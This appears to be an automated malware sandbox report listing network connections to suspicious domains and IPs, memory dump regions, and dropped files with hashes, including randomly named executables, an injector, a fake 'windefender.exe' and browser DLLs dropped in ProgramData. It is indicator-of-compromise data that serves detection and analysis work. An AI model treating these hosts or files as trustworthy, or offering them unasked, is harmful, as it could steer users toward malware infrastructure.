US 8.8.8.8:53 194.206.67.172.in-addr.arpa udp
US 172.67.206.194:443 herdbescuitinjurywu.shop tcp
US 8.8.8.8:53 144.128.172.185.in-addr.arpa udp
US 172.67.206.194:443 herdbescuitinjurywu.shop tcp
US 172.67.206.194:443 herdbescuitinjurywu.shop tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.65:80 185.172.128.65 tcp
DE 185.172.128.65:80 185.172.128.65 tcp
US 8.8.8.8:53 65.128.172.185.in-addr.arpa udp
DE 185.172.128.144:80 185.172.128.144 tcp
DE 185.172.128.209:80 185.172.128.209 tcp
US 8.8.8.8:53 209.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 45.87.157.20.in-addr.arpa udp
US 8.8.8.8:53 download.iolo.net udp
FR 143.244.56.49:443 download.iolo.net tcp
US 8.8.8.8:53 49.56.244.143.in-addr.arpa udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 82.145.216.19:443 autoupdate.geo.opera.com tcp
NL 82.145.216.19:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 19.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 73.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 download.opera.com udp
US 8.8.8.8:53 features.opera-api2.com udp
NL 185.26.182.122:443 download.opera.com tcp
NL 82.145.216.15:443 features.opera-api2.com tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 download5.operacdn.com udp
US 8.8.8.8:53 122.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 15.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 104.18.10.89:443 download5.operacdn.com tcp
US 8.8.8.8:53 89.10.18.104.in-addr.arpa udp
US 8.8.8.8:53 4850dfb6-954d-44e6-b05f-b6e92b21bbd9.uuid.statsexplorer.org udp
US 8.8.8.8:53 westus2-2.in.applicationinsights.azure.com udp
US 20.9.155.145:443 westus2-2.in.applicationinsights.azure.com tcp
US 8.8.8.8:53 145.155.9.20.in-addr.arpa udp
DE 185.172.128.209:80 185.172.128.209 tcp
US 8.8.8.8:53 server12.statsexplorer.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun3.l.google.com udp
IT 142.251.27.127:19302 stun3.l.google.com udp
US 8.8.8.8:53 127.27.251.142.in-addr.arpa udp
US 162.159.134.233:443 cdn.discordapp.com tcp
BG 185.82.216.108:443 server12.statsexplorer.org tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 108.216.82.185.in-addr.arpa udp
DE 185.172.128.65:80 185.172.128.65 tcp
US 8.8.8.8:53 71.221.67.172.in-addr.arpa udp
BG 185.82.216.108:443 server12.statsexplorer.org tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 download3.operacdn.com udp
GB 95.101.143.243:443 download3.operacdn.com tcp
US 8.8.8.8:53 243.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 41.134.221.88.in-addr.arpa udp
BG 185.82.216.108:443 server12.statsexplorer.org tcp
NL 195.20.16.45:80 195.20.16.45 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.8.59:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 45.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 59.8.26.104.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 server12.statsexplorer.org udp
BG 185.82.216.108:443 server12.statsexplorer.org tcp
US 8.8.8.8:53 36.56.20.217.in-addr.arpa udp
N/A 127.0.0.1:31465 tcp
BG 185.82.216.108:443 server12.statsexplorer.org tcp
BG 185.82.216.108:443 server12.statsexplorer.org tcp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.129.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 233.129.159.162.in-addr.arpa udp
US 8.8.8.8:53 showlock.net udp
NL 190.2.153.202:40001 showlock.net tcp
US 8.8.8.8:53 202.153.2.190.in-addr.arpa udp

Files

memory/3192-0-0x00000194D67A0000-0x00000194D67AE000-memory.dmp

memory/3192-1-0x00007FFD21FC0000-0x00007FFD229AC000-memory.dmp

memory/3192-2-0x00000194F0E40000-0x00000194F0E50000-memory.dmp

memory/3192-3-0x00000194D8460000-0x00000194D846A000-memory.dmp

memory/3192-4-0x00000194F0C90000-0x00000194F0CAC000-memory.dmp

memory/3192-5-0x00000194F0C90000-0x00000194F0CA4000-memory.dmp

memory/3192-6-0x00000194F0C90000-0x00000194F0CA0000-memory.dmp

memory/3192-7-0x00000194F0E20000-0x00000194F0E38000-memory.dmp

memory/3192-8-0x00000194F1DE0000-0x00000194F1F3A000-memory.dmp

memory/3192-9-0x00000194F1D30000-0x00000194F1DD4000-memory.dmp

memory/3192-10-0x00000194F0E20000-0x00000194F0E3A000-memory.dmp

memory/3192-11-0x00000194F20A0000-0x00000194F21C2000-memory.dmp

memory/3192-12-0x00000194F1CF0000-0x00000194F1D34000-memory.dmp

memory/3192-14-0x00000194F0C90000-0x00000194F0CA0000-memory.dmp

memory/3192-13-0x00000194F1E90000-0x00000194F1F06000-memory.dmp

memory/3192-15-0x00000194F1CA0000-0x00000194F1CD0000-memory.dmp

memory/3192-16-0x00000194F23C0000-0x00000194F247A000-memory.dmp

memory/3192-17-0x00000194F2120000-0x00000194F2180000-memory.dmp

memory/3192-18-0x00000194F0E00000-0x00000194F0E22000-memory.dmp

memory/3192-19-0x00000194F2540000-0x00000194F2905000-memory.dmp

memory/3192-20-0x00000194F0E20000-0x00000194F0E3E000-memory.dmp

memory/3192-21-0x00000194F2360000-0x00000194F23DC000-memory.dmp

memory/3192-22-0x00000194F2540000-0x00000194F25DC000-memory.dmp

memory/3192-23-0x00000194F0E10000-0x00000194F0E18000-memory.dmp

memory/3192-25-0x00000194F0E10000-0x00000194F0E18000-memory.dmp

memory/3192-24-0x00000194F0E10000-0x00000194F0E1E000-memory.dmp

memory/3192-26-0x00000194F1E90000-0x00000194F1EB2000-memory.dmp

memory/3192-30-0x00000194F1DB0000-0x00000194F1DD0000-memory.dmp

memory/3192-31-0x00000194F2540000-0x00000194F25F0000-memory.dmp

memory/3192-29-0x00000194F1DB0000-0x00000194F1DC2000-memory.dmp

memory/3192-28-0x00000194F0E10000-0x00000194F0E1A000-memory.dmp

memory/3192-27-0x00000194F1D20000-0x00000194F1D3A000-memory.dmp

memory/3192-32-0x00000194F2CE0000-0x00000194F2E56000-memory.dmp

memory/3192-33-0x00000194F2120000-0x00000194F2142000-memory.dmp

memory/3192-34-0x00000194F2FE0000-0x00000194F31E8000-memory.dmp

memory/3192-35-0x00000194F1D20000-0x00000194F1D30000-memory.dmp

memory/3192-36-0x00000194F2120000-0x00000194F214A000-memory.dmp

memory/3192-41-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-47-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-51-0x00000194F23A0000-0x00000194F23BA000-memory.dmp

memory/3192-50-0x00000194F2710000-0x00000194F2774000-memory.dmp

memory/3192-49-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-48-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-46-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-53-0x00000194F2CE0000-0x00000194F2E5A000-memory.dmp

memory/3192-52-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-45-0x00000194F21B0000-0x00000194F21D0000-memory.dmp

memory/3192-44-0x00000194F1D20000-0x00000194F1D30000-memory.dmp

memory/3192-43-0x00000194F2540000-0x00000194F258A000-memory.dmp

memory/3192-42-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-40-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-39-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-38-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-37-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-55-0x00000194F23C0000-0x00000194F23D2000-memory.dmp

memory/3192-54-0x00000194F1D20000-0x00000194F1D28000-memory.dmp

memory/3192-56-0x00000194F3400000-0x00000194F3765000-memory.dmp

memory/3192-57-0x00000194F27B0000-0x00000194F28BA000-memory.dmp

memory/3192-58-0x00000194F3EC0000-0x00000194F429A000-memory.dmp

memory/3192-59-0x00000194F2750000-0x00000194F27FA000-memory.dmp

memory/3192-60-0x00000194F26A0000-0x00000194F271E000-memory.dmp

memory/3192-61-0x00000194F2DF0000-0x00000194F2E5E000-memory.dmp

memory/3192-62-0x00000194F2540000-0x00000194F256E000-memory.dmp

memory/3192-63-0x00000194F3100000-0x00000194F31A6000-memory.dmp

memory/3192-236-0x00007FFD26840000-0x00007FFD26873000-memory.dmp

memory/3192-250-0x00000194F0CB0000-0x00000194F0CC4000-memory.dmp

memory/760-262-0x0000000000400000-0x0000000000408000-memory.dmp

memory/3192-267-0x00000194F1B60000-0x00000194F1C23000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_om1ie5o2.2ji.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3192-281-0x00007FFD23C30000-0x00007FFD23C4C000-memory.dmp

memory/3192-289-0x00007FFD23C30000-0x00007FFD23C4B000-memory.dmp

memory/3192-292-0x00007FFD23C20000-0x00007FFD23C42000-memory.dmp

memory/3192-304-0x00007FFD23C00000-0x00007FFD23C1D000-memory.dmp

C:\Users\Admin\Pictures\sSFaevQCJ62KOA706zYF9Hv0.exe

MD5 5b423612b36cde7f2745455c5dd82577
SHA1 0187c7c80743b44e9e0c193e993294e3b969cc3d
SHA256 e0840d2ea74a00dcc545d770b91d9d889e5a82c7bedf1b989e0a89db04685b09
SHA512 c26a1e7e96dbd178d961c630abd8e564ef69532f386fb198eb20119a88ecab2fe885d71ac0c90687c18910ce00c445f352a5e8fbf5328f3403964f7c7802414c

C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe

MD5 7960d8afbbac06f216cceeb1531093bb
SHA1 008221bf66a0749447cffcb86f2d1ec80e23fc76
SHA256 f6e476e8ccb571b9d7a76234953ad428e883ff4712b0062498ba3275d9749b84
SHA512 35d12e81eb892aeb2237049beca61a81469dea5b1c9b7a0b9f49fbf95a95c756509d9e76c732fb10b504f9f9692e1fbe83ea2fd09d791f793a928c01974b8147

C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe

MD5 80fbcd8bcab6ddca53a467dfc54b2123
SHA1 5394a3de0dc598eeba66870d9070f54e8b137ede
SHA256 fff7af7e094a0f3d5e5b87eebbb5290e3d7570e192426e81909278abf8d0350b
SHA512 d7d14f7465da79ac9bfb1d88431e397e5f13fe7339f819b8e0404110bd73d10224d20c2b68178da3b7504de17c0b475f97ade83ab93d842310cf3baa605ac42c

memory/1936-372-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\Pictures\0N0WVNBdsqyAbvghlSUfXuLY.exe

MD5 dc968cf2e01f4cfd62f2bdb6e09d4304
SHA1 3bf3dc68736319a6c421d1a69198b43baffcbe02
SHA256 9af2203c36e73af423b49fb588ad1daf58273fd4b1c911ff1fbb2244d12837f5
SHA512 fbeb9114f5a08149881fe5907b2ee1bcabc24ae61ff735b9541f48960b883e905c328062363e701784d06cf8f57c50771f0c15ea3b1b9aeea352ceca88f4f4af

memory/1936-388-0x0000000000400000-0x000000000046D000-memory.dmp

C:\Users\Admin\Pictures\nnSCXm45njgDpKLHu0i3guAa.exe

MD5 c6df1ad711d81e1ac2a026bd0ab09c6b
SHA1 aea2a0ebea46420ab8b209a11eb5ddb120ab88fa
SHA256 c23bb2236be84a0d9c7150de9bde4ed734b4b6352f3ddab33997c521ac109721
SHA512 15d95fceeb6635e507239521e577ed27e658a1a67a123a2850b8088bff467260f062630c74803fdda5f8d0f3193cba30a26a02a2fd3fa610be712cf382debe5a

memory/1936-406-0x0000000003610000-0x0000000003A10000-memory.dmp

memory/1936-407-0x0000000003610000-0x0000000003A10000-memory.dmp

memory/1936-410-0x00007FFD2F360000-0x00007FFD2F53B000-memory.dmp

memory/1936-413-0x0000000074A10000-0x0000000074BD2000-memory.dmp

memory/2956-414-0x00000000029B0000-0x00000000029B9000-memory.dmp

memory/2956-428-0x00007FFD2F360000-0x00007FFD2F53B000-memory.dmp

memory/2956-432-0x0000000074A10000-0x0000000074BD2000-memory.dmp

C:\Users\Admin\AppData\Local\PiN62kOGBcsr59FGv3X2Oc1b.exe

MD5 ac5f59828c7112f4d6f37f3daea03a4c
SHA1 780cbc00e9a044da535af3f1da25445c893a8e53
SHA256 6b0109f5a9106f6cfa857fd3380aaed9c3d461bd8303d58a22af7a42b658b1fc
SHA512 7b68ba612901c89af3a50c5241c03001911a7f8b4cb60966a8578b9eb9dfdbd3c917391af1c12e75217d557c1c2367971a8a9edd05a3fb0aafe68774e46db873

C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe

MD5 e2a6c1f58b137874e490b8d94382fcdb
SHA1 71529c5d708091b1e1a580227dc52e62a140edd1
SHA256 4801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437
SHA512 24d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff

memory/2156-728-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/4188-904-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/4648-944-0x0000000000400000-0x0000000000B06000-memory.dmp

memory/3468-1182-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe

MD5 8bc396803bf0c509173078f354cb293b
SHA1 8a8e2298863cf6d5b5ad1c1f1efdb4f372f1cfa0
SHA256 e79bb6f916ff4f4bcca0dd2bb4c16233090265c38f3aeaa4a19bb125138773bb
SHA512 da3e916fb3b662584e3f1c8e5e6ac3c75c2f8aba0113597257cae5e9515944055e59d242efd08155939ea7044c7bf15a242f8d950e0a4a996889cbad1e20cd83

C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe

MD5 a533c58be371236669106ab5243b05bb
SHA1 59e8eae350fd911b9d74940fd5a0793f6b4fddc0
SHA256 6f746358af1862e923dee83621f64d56b2e8d8f8936e71d4d6bc565e97e58b09
SHA512 83970ca812ebef5e7c7a4e32c6b6a48d0028f688241441fedfa00e9171592bbc6fa883f0bc7f2603d31f687b1510633bca5468b3ecb96481aa62451c85885f8d

memory/2156-1570-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/3616-1634-0x0000000000400000-0x0000000000B0E000-memory.dmp

memory/2272-1644-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 0b5d94d20be9eecbaed3dddd04143f07
SHA1 c677d0355f4cc7301075a554adc889bce502e15a
SHA256 3c6f74219d419accdd3de0d14fa46ff290fd430eddcc5352deddd7de59b4928c
SHA512 395e5d0f28819f773b8d53363b7df73cc976124d1accce104390fdb3f5ebf57d8bb357e616910c03e1a9d67985704592640e442bd637009e32086bb1b2088916

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 2f2c74ace52954e573b39121d876ae61
SHA1 7b1f39447fb7e54947bdd4efc1533bfd0aa6f9a1
SHA256 ba0ef12729440284ca25d45bcbd181ab0d3007edcddb62534d4a539643ee79dc
SHA512 ef77bbcc39c4b88b288b6ff9d97601aaba9167fe63a0be81d48a10b403820066d6bc4b2820b2b2e28e46ca2613fb079c353d7c038e16cedb6899666235be39cc

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 db01a2c1c7e70b2b038edf8ad5ad9826
SHA1 540217c647a73bad8d8a79e3a0f3998b5abd199b
SHA256 413da361d77055dae7007f82b58b366c8783aa72e0b8fbe41519b940c253b38d
SHA512 c76ff57fcee5cdf9fdf3116d4e1dc0cf106867bf19ab474b763e242acf5dca9a7509cb837c35e130c3e056636b4e8a4e135512a978bcd3dd641e20f5bf76c3d6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 074b02993bb16117aeca75213f4ca903
SHA1 aff76b70cae5333ba579b1cf17deb54157f2dc72
SHA256 799c7842cc5640b6f5e6a167b19221a05d9b7dbf6fd9499c6b182248e24d5874
SHA512 ddc94c9024b2d9f7cbef23df6942055affdf786ced0be6ef940466bdb810f3e9204b4831c5aae7da94bc9bdb40d3a12acf1f19f4d4e332cd23f8f4f6f8578ecf

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 2d6be03ce360cd526be070185c60cc77
SHA1 1f2549e6597e40a8b65b871df7039ab5396e0aca
SHA256 f69f1d27c837bf16a8b7a45236e4dd2fa9bb3fc1231c9e87fb5edff59136f81c
SHA512 9c33ffdb3b7ef2b302470d65281eb392267819b8f368284cd8c3b12f6e8edeb2bebdeddad5235ba898945d5d74fb797c244aa0a8a9902c7bf1abc9eeecd7d284

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 fb220ddc5b15996b58c271b593b18131
SHA1 287fd1004cf2b3ab78ce403d1f57400cc618dab9
SHA256 4dda0c3bc32bd6462a1a4cd4e0bb94411f76eea8cc2e55c14ab9e2027c431b98
SHA512 70cb96620e4851d1663175ea3070a2095f88481eedc0a62b5282c46908e16906db0809a5c15ee1ac73ac0481f052afcb2f8ccdb067f510dbd92b4f775096f4ed

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 32b7c64b141eadd68e15d310d826c937
SHA1 69ecab06a97cfebde8913676b819899c4f5a835e
SHA256 9aa02853e86e12d8e2161bb6c1027985b4a06b0ac3f527e0ea8d0d2aa98b0276
SHA512 511a88124c4f4e3ba9e2b8deb033885f5ba17b43d085b88daf1f2c4a224080a464ec8a22ef823aa7277fe962b82f11368ead1a4d8b2b4eceea0ac4217cfe0c37

C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe

MD5 1061ab336ce1c7922a6588fcc57f859b
SHA1 59082d52e507a4eefaea150e67d319e0e768c1de
SHA256 ac3c36b796fbddb84e8e8cfb18689b302124878928c7ba8252ae1b57767fc62e
SHA512 39b68e97a2f87ce6d054a90052ce954f64c9af3a4e4a03dd030695fa359f117a45a7c1d6f9622fa45b22693e28ebc2368d6e8ed469ff7bbe2b56042b7bc73cff

\Users\Admin\AppData\Local\Temp\Opera_installer_2403290154509853896.dll

MD5 117176ddeaf70e57d1747704942549e4
SHA1 75e3ab6b3469d93cce9ea2f7e22b71b987ccdf2b
SHA256 3c5b34de987116a4d3240e319c0da89a951c96b81e6705476a0fea27b22b20af
SHA512 ca2a356929c92d314aab63d7f3b246d72783212dfa3a4507f28d41a51ca0eedc78e85b1cd453aa8e02c12509f847a0216bb702154f903291c804c8a98ec378b9

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 7b4fd5460e02b8e76955c328f47cae20
SHA1 128f0cfb5ce203d0b73b742ea842bc46cc808d6a
SHA256 80a66ee84ff0e0f91d0f5f1b65b4dc59a543aed22bd561ac57e5b80d7c380d56
SHA512 1f3659a0a80b6a5f0f4c57e1174ce8dcb0614ac17a772a1243c52d57f4b02f37c88f8521f6edb0266f483b133e07651bbeb58b460e2d1d5672d73d5d83a43edf

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 9ae2c21afac0c647f9eceb059ed4f398
SHA1 43d9fc0397a9d535c0c53e019f7a4c4db05354f5
SHA256 b360ee20dd8ee5f52c7853ba1c437fdaa98823255dbd76cc44a21d3d659689d7
SHA512 8341e133092f0e1d95302ac1520d109717729ff8bc1e4e00c82530f040463a7e7046b7c5860e355689a942b3190aad7825193814cee2397bacda5b558fc0ea4b

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 0f38a17bbaa7b6f75f51c671be981097
SHA1 ee95e5225cfb623b6ddd58902bf72504993e2030
SHA256 03f4d293b34e18f429d34282179a04a705d448f3b88b88982486997f6cd51f39
SHA512 429100ae213ea857fa3fefea7b512bb616219f76cf2a55a4735776650806d42582ff886cd4779a1406d2bc9d0f514c93e40c3d12d9e764ffa8b880067bd704a2

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 42281b0957a7e542e43c174ad4c790dc
SHA1 8dd3b5dba6f119734e5ed8891aae255d2e92e82b
SHA256 69c29ffdc563fbda59fae2cf563647eba35ababa88d0af2f023471d787a28f98
SHA512 486c554b99ad1272c35f0f6ef498fe28e32ab79fa3f7b298a6db5f9154701e04ef5568effec47d97db0c071ddd9a7b9e0da8a66b7c854583d0c6984018fe3c2f

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 62f22d304c9e56d2e4b36ceccdfd6771
SHA1 109b4b071df1344006e67a1a18fdb9cf2cd34196
SHA256 98f0f14f2212b61ed7a44a3fa9dc5bb607c78fbf54795b8198ed836eb45b49d5
SHA512 473b8455507c9d726c402f203827630ebf281747b1c2ca37202f4453a6150217ce5b6d25e0b47a72bbefb2ed549ed498ad9bb60d7079560ec14fb3aae84d209c

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ed79689a46c092b48dfb1327c0b87100
SHA1 3797488b86c49ad445db00fc0b9d9bb629584cf9
SHA256 db83ebdad766e39d7bc7c1e7511d1dbf394768a0b31f29998bc613a7355edf10
SHA512 04e5ae0d5d3b3585098d2008f4e78de3ce1a911ff77414a8af28207ae7435a54e9b901769c7a4d070ffe0db4830416b2a81558e37025c59ff228ebe575be9448

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 4dfec3152d58ec0d986d314e65f614d4
SHA1 4d145f49e46e8ea5e45efc8d905a0da01ed09ae8
SHA256 1e3602669f79d2b8c3829f1cf87826f6e6204dbaa0d43b3d398aa459ca91b3dc
SHA512 fef0f86f9b1a2511ffaa99d9224868c632297c14837626878e206ee320692912e6a2d09d4bb331d228f8ae70c3993e9816d04e191423bba67fafe090eb168210

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 50d766647e6bc3426dd0d3e525a69b93
SHA1 1aa616ba5fb7de29870bc5044be5e6e60937e667
SHA256 261d08311c781897107f33ae66562fe32e23ce8e8d7d863cfadf0a17beba3625
SHA512 7743fdfc8986a73d68b65cfb3412b81b4e59ccd0b2c4a48f4ca5f2f9059fa2e071670c6ada1ff405cc569a4d0e54242d37d7dfa90c3927726c3fb685645ae160

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 10e3e935f570e51005087793d4e54f5c
SHA1 c786469d4c6b8a4ffab851750994e8692cbd8b5a
SHA256 f0dd4c1f0a730ebc7ae6d49fe4e257fb1039ec566024fa1a2e54bca49aca6fbc
SHA512 c748cc6f6976b062e62239734f7efb85e0f363e18247d55870f4dadb40b99bc37c6ab63473667a8b2c0eccd350e5e286bc2312ee3704b2d0676f3a2532e6202d

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe

MD5 fe380780b5c35bd6d54541791151c2be
SHA1 7fe3a583cf91474c733f85cebf3c857682e269e1
SHA256 b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53
SHA512 ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\opera_package

MD5 401c352990789be2f40fe8f9c5c7a5ac
SHA1 d7c1e902487511d3f4e1a57abdee8a94d5483ed4
SHA256 f62f4ebc7eca46d9cddfb02cc0305da5efdd6f3601fb0f53da555e19558869a3
SHA512 efc6d4224e3721e91efb2ea8f4b74685cba607260c69d08eac26866c52b8127080a42799d9f76ab1661b8ca63c946fcf35dddf0a63ab3cd258ea44a27dd769c8

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\additional_file0.tmp

MD5 20d293b9bf23403179ca48086ba88867
SHA1 dedf311108f607a387d486d812514a2defbd1b9e
SHA256 fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348
SHA512 5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe

MD5 b3f05009b53af6435e86cfd939717e82
SHA1 770877e7c5f03e8d684984fe430bdfcc2cf41b26
SHA256 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7
